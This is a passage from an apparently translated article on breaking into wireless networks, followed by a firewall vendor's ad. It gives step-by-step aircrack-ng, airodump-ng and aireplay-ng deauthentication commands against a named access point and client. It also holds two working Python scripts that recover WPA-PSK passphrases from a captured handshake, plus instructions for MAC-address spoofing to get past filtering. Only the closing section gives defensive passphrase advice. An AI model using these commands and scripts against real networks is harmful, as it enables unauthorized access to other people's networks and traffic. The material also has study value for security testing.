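    """Offline dictionary attack: for each candidate, rederive PMK -> PTK -> KCK and
    compare the recomputed MIC with the one in the captured frame."""
    target = captured[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = prf_512(wpa_pmk(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured), target):
            return candidate
    return None


CAPTURED = build_handshake(PASSPHRASE)
WORDLIST = ["password", "12345678", "dlinkG", "correct-horse-11", "qwertyui"]   # constructed

if __name__ == "__main__":
    # The 802.11i specification's own test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    print("recovered passphrase:", crack_psk(CAPTURED, WORDLIST))
```

Because the SSID is the PBKDF2 salt, precomputed tables only help against common network names, and a passphrase absent from the wordlist is never recovered, which is the point made in the text about WPA-PSK depending on the dictionary.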

Table 3. Options of the aircrack-ng command (option, possible value, description)

-a <mode>: 1 = static WEP, 2 = WPA-PSK. Specifies the type of attack (WEP or WPA-PSK).
-e <essid>: network name. If given, all IV packets from the network with this ESSID are used. Also needed to attack a WPA-PSK network whose ESSID is not broadcast (hidden network identifier mode).
-b <bssid>: access point MAC address. Selects the network by the access point's MAC address.
-q: quiet mode. Nothing is displayed until the key is found or the search fails.
-c: WEP only. Restricts the key search to alphanumeric characters (letters and digits).
-t: WEP only. Restricts the key search to binary-coded-decimal hexadecimal characters.
-h: WEP only. Restricts the key search to numeric characters.
-d <start>: WEP only. Specifies the beginning of the key in hexadecimal. Used for debugging.
-m <maddr>: client MAC address. WEP only; filters the usable packets by the client's MAC address. -m ff:ff:ff:ff:ff:ff uses all IV packets.
-n <nbits>: 64 (40-bit key), 128 (104-bit key), 152 (128-bit key), 256 (232-bit key), 512 (488-bit key). WEP only; the key length. The default is 128, i.e. a 104-bit key.
-i <index>: WEP only. Uses only IV packets with the given key index (1 to 4). By default the key index is ignored.
-f <fudge>: WEP only. Fudge factor: the default is 2 for 104-bit keys and 5 for 40-bit keys. A higher value lets the key be found with fewer packets, but takes longer.
-k <korek>: WEP only. Excludes one of the KoreK attack types (there are 17 in total).
-x0: WEP only. Disables brute-forcing of the last key byte.
-x1: WEP only. Enables brute-forcing of the last key byte (default).
-x2: WEP only. Enables brute-forcing of the last two key bytes.
-X: WEP only. Disables multithreaded brute-forcing on SMP systems.
-y: WEP only. Experimental single brute-force attack, for the case where the standard attacks fail to find the key even with more than 1 million IV packets.
-w <words>: path to the dictionary used in the WPA-PSK attack.

With WEP the main problem is that the key length is not known in advance, so several values of -n may have to be tried. If -n is not given, the default is 128, i.e. a 104-bit key.

If something is known about the key itself (only digits, only letters, or letters and digits without special characters), the -c, -t and -h options narrow the search.

In our case the aircrack-ng command was:

aircrack-ng -a 1 -e dlinkG -b 00:0d:88:56:33:b5 -m 00:0f:ea:91:7d:95 -n 128 dump.ivs

Note that the client MAC filter is -m; -c would instead restrict the key to alphanumeric characters (Table 3). Here the access point and client MAC addresses and the ESSID are redundant, since only one access point and one client were present, but with several access points and clients in range they must be given.

The 128-bit WEP key (104 secret bits) was found in just 25 s (Fig. 6). Cracking a WEP network is thus not a serious problem, although it does not always succeed: the accumulated IV packets may be too few to recover the key, in which case more traffic has to be collected first.

Fig. 6. Recovery of a 128-bit key
using the aircrack-ng utility

For WPA-PSK the command syntax is:

aircrack-ng -a 2 -e dlinkG -b 00:0d:88:56:33:b5 -w dict dump.cap

Here the chance of success, i.e. of recovering the whole passphrase, depends entirely on the dictionary: if the passphrase is in it, it will be found; if not, it will not. The dictionary must be placed in the working directory or given by its full path. A selection of good dictionaries is available at www.insidepro.com. If they do not help, the passphrase is most likely a meaningless string of characters: dictionaries contain words, phrases and convenient keyboard patterns, not arbitrary character sequences. Even then there is a way out: some password-cracking utilities generate dictionaries from a given character set and maximum word length; PasswordPro v.2.2.5.0 is one example.

Still, the probability of cracking a WPA-PSK passphrase is low, and every candidate is expensive: the key is derived with PBKDF2-HMAC-SHA1 over 4096 iterations, so a CPU tests only thousands of passphrases per second rather than millions. If the passphrase is not a word but a random combination of letters and digits, guessing it is practically impossible.
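As an added example (not code from the original article or from the aircrack-ng project), the following Python reproduces what the handshake capture and the dictionary attack above amount to: a check that the capture actually holds a complete handshake (message 1 with the ANonce from the access point and message 2 with the SNonce and MIC from the client, which is what airodump-ng must see before it reports "WPA handshake"), followed by the attack that aircrack-ng -a 2 performs on it: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID) with 4096 iterations, PTK via PRF-512 over the two MAC addresses and the two nonces, and a 16-byte HMAC-SHA1 MIC over the EAPOL-Key frame. The network name and MAC addresses are the article's dlinkG example; the nonces, the passphrase "correct horse" and the three-word dictionary are constructed for the demonstration, and the handshake is synthesized in memory rather than read from a pcap file.

```python
import hashlib
import hmac
import struct

# Network taken from the article's example (hypothetical values): ESSID dlinkG,
# access point 00:0d:88:56:33:b5, client 00:0f:ea:91:7d:95.
SSID = "dlinkG"
AP_MAC = bytes.fromhex("000d885633b5")
STA_MAC = bytes.fromhex("000fea917d95")

# EAPOL-Key "Key Information" bits; descriptor version 2 means the MIC is HMAC-SHA1-128
KI_VERSION_HMAC_SHA1, KI_PAIRWISE, KI_INSTALL = 0x0002, 0x0008, 0x0040
KI_ACK, KI_MIC, KI_SECURE = 0x0080, 0x0100, 0x0200
MIC_OFFSET, MIC_LEN = 81, 16  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits): the expensive
    step paid for every candidate in a dictionary attack, and the reason the SSID matters."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over both MAC addresses and both nonces; the first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Build an 802.1X EAPOL-Key frame (RSN descriptor type 2, empty Key Data)."""
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter)  # descriptor, key info, key length, replay
            + nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # nonce, Key IV, Key RSC, Key ID
            + mic + struct.pack(">H", 0))                          # MIC, Key Data length
    return struct.pack(">BBH", 2, 3, len(body)) + body            # 802.1X version 2, type 3 = EAPOL-Key


def key_info_of(frame: bytes) -> int:
    return struct.unpack(">H", frame[5:7])[0]


def replay_of(frame: bytes) -> int:
    return struct.unpack(">Q", frame[9:17])[0]


def nonce_of(frame: bytes) -> bytes:
    return frame[17:49]


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed), truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def simulate_handshake(passphrase: str, anonce: bytes, snonce: bytes) -> list:
    """Constructed four-way handshake, as airodump-ng sees it after a deauthenticated client
    re-authenticates. Returns a list of (source MAC, EAPOL frame) pairs."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    base = KI_VERSION_HMAC_SHA1 | KI_PAIRWISE
    frames = [
        (AP_MAC, eapol_key_frame(base | KI_ACK, 1, anonce)),                                     # message 1
        (STA_MAC, eapol_key_frame(base | KI_MIC, 1, snonce)),                                    # message 2
        (AP_MAC, eapol_key_frame(base | KI_INSTALL | KI_ACK | KI_MIC | KI_SECURE, 2, anonce)),  # message 3
        (STA_MAC, eapol_key_frame(base | KI_MIC | KI_SECURE, 2, b"\x00" * 32)),                 # message 4
    ]
    out = []
    for src, f in frames:
        if key_info_of(f) & KI_MIC:  # messages 2-4 carry a MIC over the frame with the MIC field zeroed
            f = f[:MIC_OFFSET] + compute_mic(kck, f) + f[MIC_OFFSET + MIC_LEN:]
        out.append((src, f))
    return out


def find_handshake(capture: list, ap: bytes, sta: bytes):
    """The check to make before stopping the capture: is there a message 1 (ANonce) from the
    access point and a message 2 (SNonce + MIC) from the client with the same replay counter?
    Returns (anonce, snonce, message-2 frame) or None."""
    m1 = {replay_of(f): f for src, f in capture
          if src == ap and key_info_of(f) & KI_ACK and not key_info_of(f) & KI_MIC}
    for src, f in capture:
        ki = key_info_of(f)
        if src == sta and ki & KI_MIC and not ki & KI_SECURE and replay_of(f) in m1:
            return nonce_of(m1[replay_of(f)]), nonce_of(f), f
    return None


def crack(wordlist, ssid: str, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes, m2: bytes):
    """What aircrack-ng -a 2 -w <dict> does: derive the KCK for each candidate passphrase
    and compare the MIC it produces with the MIC in message 2."""
    target = m2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # WPA-PSK passphrases are 8 to 63 characters; anything else cannot be the key
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap, sta, anonce, snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, m2), target):
            return candidate
    return None


if __name__ == "__main__":
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # constructed nonces
    capture = simulate_handshake("correct horse", anonce, snonce)
    hs = find_handshake(capture, AP_MAC, STA_MAC)
    print("handshake complete:", hs is not None)
    print("key found:", crack(["password", "12345678", "correct horse"], SSID, AP_MAC, STA_MAC, *hs))
```

Two things the block makes visible that the text only states. First, only the handshake is needed: the MIC in message 2 is a function of the passphrase, the SSID, the two MAC addresses and the two nonces, all of which are in the capture, so no further traffic helps. Second, the cost per guess is the 4096-iteration PBKDF2 call, which is why a multi-gigabyte dictionary takes hours and why a passphrase absent from the dictionary is never found.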

Summary

To sum up what has been said about cracking wireless networks, here once more are the main stages and the commands used at each of them (note that the client MAC filter of aircrack-ng is -m, see Table 3).

Stage 1. Gathering information about the network:

airmon-ng start wifi0

airodump-ng ath1

Stage 2. Collecting packets:

  • WEP case:

airodump-ng --ivs -w dump --band g --channel 11 ath1

aireplay-ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 20 ath1

(only if there is insufficient traffic; run in a separate console session);

  • WPA-PSK case:

airodump-ng -w dump --band g --channel 11 ath1

aireplay-ng -e dlinkG -a 00:0d:88:56:33:b5 -c 00:0f:ea:91:7d:95 --deauth 10 ath1

(run in a separate console session once the capture is running).

Stage 3. Packet analysis:

  • WEP case:

aircrack-ng -a 1 -e dlinkG -b 00:0d:88:56:33:b5 -m 00:0f:ea:91:7d:95 -n 128 dump.ivs

  • WPA-PSK case:

aircrack-ng -a 2 -e dlinkG -b 00:0d:88:56:33:b5 -w dict dump.cap

Hacking wireless networks using the aircrack-ng 0.6.2-win package and Windows XP

As noted at the beginning of the article, there is a version of the package, aircrack-ng 0.6.2-win, for Windows XP. Its capabilities are not as extensive as those of the Linux version, so unless you have a strong aversion to Linux, the BackTrack disk is the better option.

The first thing you will have to face when using the Windows version of the aircrack-ng program is the need to replace the standard drivers from the wireless network adapter manufacturer with special drivers that support monitoring and packet interception mode. Moreover, as in the case of the Linux version of the program, the specific version of the driver depends on the chip on which the network adapter is built. For example, when using our Gigabyte GN-WMAG wireless PCMCIA adapter based on the Atheros AR5004 chip, we used driver version 5.2.1.1 from WildPackets.

The procedure for hacking a wireless network using the Windows version of the aircrack-ng package is quite simple and conceptually repeats the procedure for hacking wireless networks using the Linux version of the package. It is traditionally performed in three stages: collecting information about the network, intercepting packets and analyzing them.

To start working with the utility, you need to run the Aircrack-ng GUI.exe file, which has a convenient graphical interface and is, in fact, a graphical shell for all the utilities included in the aircrack-ng 0.6.2-win package. The main program window (Fig. 7) has several tabs, by switching between which you can activate the necessary utilities.

Fig. 7. Main window of the Aircrack-ng GUI utility

To collect the necessary information about the network, go to the airodump-ng tab; the airodump-ng 0.6.2 utility then starts in a separate window.

When airodump-ng 0.6.2 starts (Fig. 8), a dialog box asks for the wireless adapter (Network interface index number), the adapter's chip type (Network interface type (o/a)) and the channel number (Channel(s): 1 to 14, 0=all; if the channel is unknown, all channels can be scanned). It also asks for the output file name prefix (Output filename prefix) and whether to save whole packets (CAP files) or only the initialization vectors (IVS files) (Only write WEP IVs (y/n)). For WEP an IVS file is enough to recover the key; for WPA-PSK a CAP file is required. By default the IVS or CAP files are created in the same directory as the airodump-ng 0.6.2 program.

Fig. 8. Setting up the airodump-ng 0.6.2 utility

After configuring all the options of the airodump-ng 0.6.2 utility, an information window will open, which displays information about detected wireless access points, information about network clients, and statistics of intercepted packets (Fig. 9).

Fig. 9. Information window of the airodump-ng 0.6.2 utility

If there are several access points, statistics will be displayed for each of them.

The first step is to write down the MAC address of the access point, the SSID of the wireless network and the MAC address of one of the clients connected to it (if there are several of them). Then you need to wait until a sufficient number of packets have been intercepted. To stop the packet capture process (utility operation), use the Ctrl+C key combination. Note that the Windows version of the package does not provide methods to forcefully increase traffic between the access point and the network client (remember that the Linux version of the package provides the aireplay-ng utility for this).

The main problem when attacking WPA-PSK networks with the Windows version of Aircrack-ng GUI 0.6.2 is that the client authentication (the handshake) must be captured in the CAP file, which means lying in wait with airodump-ng running until a client connects, since the Windows version has no aireplay-ng to force it. Once the handshake is in the CAP file, airodump-ng can be stopped and the cracking started. There is no need to accumulate further packets: only the handshake packets exchanged between the access point and the client are used to recover the key.

For WEP, once the IVS file has been written, it can be analysed with the aircrack-ng 0.6.2 utility. To launch it, open the appropriate tab in the main Aircrack-ng GUI window and configure the utility. For WEP the configuration consists of setting the WEP key length, the ESSID of the network, the access point's MAC address, excluding particular attack types (KoreK attacks), restricting the character set of the key if necessary, and so on. All the same settings are available as in the Linux version of the utility; the only difference is that in the Linux version they are given as command-line options, while the Windows version uses a graphical interface (Fig. 10).

Fig. 11. Result of IVS file analysis
by the aircrack-ng 0.6.2 utility

The result of the IVS file analysis is shown in Fig. 11. It is unlikely that the line KEY FOUND! needs comments. Please note: the secret key was calculated in just 1 second!

When using WPA-PSK encryption in the settings of the aircrack-ng 0.6.2 utility, it is necessary to use the CAP file as the output file, and not the IVS file. In addition, you need to specify the path to the dictionary used for hacking, which is pre-installed in the directory with the aircrack-ng 0.6.2 program (Fig. 12).

Fig. 12. Setting up the aircrack-ng 0.6.2 utility
for WPA-PSK

The result of the CAP file analysis is shown in Fig. 13. However, it should be borne in mind that a positive result of the key search is possible only if the password is present in the analyzed dictionary.

Fig. 13. Result of CAP file analysis

Bypassing MAC address filter protection

At the very beginning of the article we noted that, in addition to WEP and WPA-PSK encryption, hidden network identifier mode and MAC address filtering are often used and are traditionally classed as wireless security features.

As already shown with the aircrack-ng package, hidden network identifier mode cannot be relied on at all. The airodump-ng utility still shows the network SSID, since every client transmits it in the clear when it associates, and the SSID can then be used to create a connection profile (an unauthorized one) for the network.

As for MAC address filtering, everything is very simple. Plenty of utilities for both Linux and Windows let you change the MAC address of a network interface. Windows examples include SMAC 2.0 (paid, http://www.klcconsulting.net/smac), MAC MakeUP (free, www.gorlani.com/publicprj/macmakeup/macmakeup.asp, Fig. 14) and MAC Spoofer 2006 (free); on Linux the same is done with the macchanger utility or directly with ip link set dev <interface> address <mac>.

Fig. 14. MAC address spoofing using the MAC MakeUP utility

Having made such a substitution, you can pass yourself off as a legitimate client and gain unauthorized access to the wireless network. Moreover, both clients (the real one and the intruder) will coexist quite calmly on the same network with the same MAC address, and the intruder will be assigned exactly the same IP address as the real client.

Conclusions

So the whole security system of a wireless network based on WEP is not hard to overcome. Many will say this is irrelevant, since WEP died long ago and is no longer used, having been replaced by the more robust WPA. Let us not rush to conclusions: this is only partly true. To extend the range of a wireless network, distributed wireless networks (WDS) built on several access points are sometimes deployed, and such networks do not support WPA, leaving WEP as the only available protection; a WDS network is cracked exactly like one built on a single access point. PDAs with a wireless module likewise do not support WPA, so including a PDA client in a wireless network requires WEP. Consequently, WEP will remain in use in wireless networks for a long time.

The examples of cracking wireless networks considered here clearly demonstrate their vulnerability. WEP can be compared to protection against fools, about as effective as a car alarm: it only keeps hooligans away. As for MAC address filtering and hidden network identifier mode, they cannot be considered protection at all, although even such measures should not be neglected when combined with others.

WPA, while much harder to crack, is also vulnerable, but the situation is not hopeless. Success in recovering a WPA passphrase depends on whether it is in the dictionary. The standard dictionary we used is just over 40 MB, which is not much; in three attempts we picked a passphrase that was not in it, and the network could not be cracked. That dictionary holds only 6,475,760 words, which is very few. Larger dictionaries exist (a three-CD set of almost 2 GB can be ordered online), but even that does not contain all possible passwords. A rough count: passwords of 8 to 63 characters built from the 26 letters of the English alphabet (case-sensitive), ten digits and the 32 letters of the Russian alphabet (case-sensitive) give 126 choices per character. For 8-character passwords alone that is 126^8 ≈ 6.3·10^16 combinations; at 8 bytes per word such a dictionary would occupy about 5·10^17 bytes, roughly half a million terabytes. And that is only eight-character strings; a dictionary of all lengths from 8 to 63 characters would be on the order of 10^122 TB. (Strictly, the 802.11i standard limits a WPA passphrase to 8 to 63 printable ASCII characters, 95 symbols, which still gives 95^8 ≈ 6.6·10^15 eight-character passphrases; the conclusion is the same.)

So don't despair: there is a good chance that your passphrase is not in any dictionary. Just do not use meaningful words when choosing it; a random string of characters such as "FGproukqweRT4j563app" is best. Note also that the WPA key is derived from the passphrase together with the network name, so precomputed tables only help an attacker against common default SSIDs; giving the network a unique name is a cheap additional measure.

  • Do you have a clear picture of what's happening on your network?
  • Can you identify and see exactly what is happening on the network at any given time?
  • Do you know how many apps you use, who uses them and for what purposes?
  • Do you know how many threats - known and unknown - are attacking your network?

Find out what is really happening on your company's network with a free network security audit using a Palo Alto Networks Next-Generation Firewall. Based on the audit results you receive a detailed report on the current state of the network, describing the applications in use and the threats identified on the company's network.

Style Telecom makes Palo Alto Networks next-generation firewalls available to its clients under a testing programme, as an assessment of the company's real level of security and a trial of Palo Alto solutions. The programme lets you use a Palo Alto Networks firewall for 30 days and get a detailed picture of what is really happening on the company's network, which potential network threats to information security are present, and recommendations for minimising them.

Most of our clients have undergone a network security audit to obtain a current assessment of their security posture and now understand which applications run on their network and what risks they pose. The advantage of this audit is that no changes to the network architecture are required: the firewall is installed transparently in the client's infrastructure in monitoring mode.

Based on the results of the network security audit, you receive a report with a detailed analysis of network traffic, covering:

    • High-risk applications. Besides legitimate software, users have access to cloud applications, remote-access applications, malware, online games and so on. During the audit we find open cloud storage (Dropbox, Google Drive, Yandex Disk), P2P file sharing (BitTorrent and eMule), TeamViewer, Skype and social media. Although these applications are not malicious in themselves, they are potentially dangerous: they reduce network performance and create opportunities attackers can use to compromise network security. The report provides a detailed analysis of the applications used on the client's network.
    • Detection of malicious software (viruses, exploits, ransomware). In most network security audits malware was detected. Malware enters the company's network through partner networks, mobile devices, removable media and Internet channels. If malware is detected, network segmentation, access policies and the policies on mobile devices and removable media should be reviewed.
    • Detection of zero-day malware. During testing the WildFire service is used, which performs heuristic and behavioural analysis of potentially dangerous files in an isolated environment before they reach the company's users. Detection of zero-day attacks may indicate a targeted attack on the company and requires a detailed investigation of information security incidents.
    • Analysis of command-and-control (C&C server) traffic. Using the Palo Alto firewall with the Threat Prevention subscription, systems infected with malicious code and controlled centrally from C&C servers can be identified, with recommendations for containing the problem.
    • Information by URL category. Uncontrolled Internet browsing exposes companies to additional risks: links to web resources often serve as sources of threats, leading to data loss and violations of corporate standards. The audit provides information on the categories of sites most frequently visited by the company's users.
    Style Telecom also offers the following additional services:
    • Consulting on the choice of a firewall system.
    • Firewall sizing based on the company's current needs and growth prospects.
    • Configuration audit of existing firewalls.
    • Optimisation of the rules configured on existing firewalls.
    • Migration of settings from existing firewalls to new ones.
    • Assessment of network infrastructure architecture and configuration and of existing information protection tools.
    • Design and implementation of firewall systems of any complexity.
    • Maintenance of firewall systems.
    You can familiarise yourself with the Palo Alto Networks firewall range in our